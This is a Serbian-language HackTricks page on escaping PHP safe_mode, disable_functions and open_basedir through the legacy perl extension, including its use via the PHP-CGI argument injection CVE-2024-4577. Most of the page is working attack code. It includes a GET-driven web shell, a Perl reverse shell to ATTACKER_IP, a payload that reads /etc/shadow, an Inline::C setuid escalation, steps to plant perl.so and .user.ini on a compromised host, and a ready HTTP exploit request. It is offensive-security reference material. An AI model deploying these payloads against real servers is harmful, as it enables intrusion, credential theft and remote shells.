PHP Perl Extension Safe_mode Bypass Exploit

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pozadina

Problem praćen kao CVE-2007-4596 potiče od legacy perl PHP extension-a, koji ugrađuje kompletan Perl interpreter bez poštovanja PHP kontrola safe_mode, disable_functions ili open_basedir. Bilo koji PHP worker koji učita extension=perl.so dobija neograničen Perl eval, pa izvršavanje komandi ostaje trivijalno čak i kada su svi klasični PHP mehanizmi za pokretanje procesa blokirani. Iako je safe_mode nestao u PHP 5.4, mnogi zastareli shared-hosting stackovi i ranjivi labovi i dalje ga isporučuju, pa je ovaj bypass i dalje koristan kada dospete na legacy kontrolne panele.

Kompatibilnost i status pakovanja (2025)

  • Poslednje PECL izdanje (perl-1.0.1, 2013) cilja PHP ≥5.0; PHP 8+ generalno ne radi zbog promena u Zend APIs.
  • PECL je u procesu zamenjivanja od strane PIE, ali stariji stackovi i dalje isporučuju PECL/pear. Koristite tok ispod za ciljeve na PHP 5/7; na novijim PHP verzijama očekujte potrebu za downgrade-om ili prelaskom na drugi injection put (npr. userland FFI).

Postavljanje testabilnog okruženja u 2025

  • Preuzmite perl-1.0.1 sa PECL-a, kompajlirajte ga za PHP granu koju planirate da napadnete, i učitajte ga globalno (php.ini) ili preko dl() (ako je dozvoljeno).
  • Brzi recept za laboratoriju zasnovanu na Debianu:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Tokom eksploatacije potvrdite dostupnost sa var_dump(extension_loaded('perl')); ili print_r(get_loaded_extensions());. Ako nedostaje, potražite perl.so ili zloupotrebite upisive php.ini/.user.ini unose da ga prisilno učitate.
  • Pošto interpreter živi unutar PHP workera, nisu potrebni eksterni binarni fajlovi — network egress filteri ili crne liste za proc_open nisu relevantni.

Lokalni build lanac kada je phpize dostupan

Ako su phpize i build-essential prisutni na kompromitovanom hostu, možete kompajlirati i ubaciti perl.so bez shell-ovanja u OS:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Ako je open_basedir primenjen, osigurajte da ubačeni .user.ini i .so budu u dozvoljenom direktorijumu; direktiva extension= se i dalje poštuje unutar basedir-a. Tok kompajliranja prati PHP manual za izgradnju PECL extensions.

Original PoC (NetJackal)

Iz http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, i dalje korisno za potvrdu da ekstenzija odgovara na eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Moderna poboljšanja Payload-a

1. Full TTY over TCP

Ugrađeni interpreter može da učita IO::Socket čak i ako je /usr/bin/perl blokiran:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Bekstvo iz fajl-sistema čak i sa open_basedir

Perl ignoriše PHP’s open_basedir, pa možete čitati proizvoljne fajlove:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Preusmerite izlaz kroz IO::Socket::INET ili Net::HTTP da exfiltrate podatke bez diranja PHP-om upravljanih deskriptora.

3. Inline Compilation for Privilege Escalation

Ako Inline::C postoji na nivou sistema, kompajlirajte pomoćne module unutar zahteva bez oslanjanja na PHP-ov ffi ili pcntl:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Posmatraj Perl kao LOLBAS toolkit — npr. izvuci MySQL DSN-ove čak i ako mysqli nedostaje:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Zloupotreba: Učitavanje perl.so preko PHP-CGI Argument Injection (CVE-2024-4577)

Na Windows instalacijama koje i dalje izlažu PHP-CGI, 2024 argument-injection regression (CVE-2024-4577) vam omogućava da prosledite proizvoljne -d opcije interpreteru. To znači da možete učitati Perl extension čak i kada je dl() onemogućen i php.ini je samo za čitanje:

  • Izgradite ili otpremite kompatibilan perl.dll/perl.so u direktorijum u koji web proces može pisati (npr. C:\xampp\htdocs\temp\perl.dll).
  • Pošaljite jedan HTTP zahtev koji ubrizga -d extension=C:\\xampp\\htdocs\\temp\\perl.dll i, u istom telu zahteva, Perl-backed payload:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Pošto PHP worker sada ugnježđuje Perl pre nego što pročita telo zahteva, sve klasične kontrole disable_functions/open_basedir se zaobilaze. Ovo funkcioniše na ranjivim Windows/CGI stackovima dok se ne ispravi (PHP 8.1.29/8.2.20/8.3.8 i novije verzije zatvaraju regresiju). Ako open_basedir blokira putanju do DLL-a, prvo ubacite fajl u dozvoljeni osnovni direktorijum ili iskoristite postojeću svima čitljivu DLL putanju koju isporučuje XAMPP.

References

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks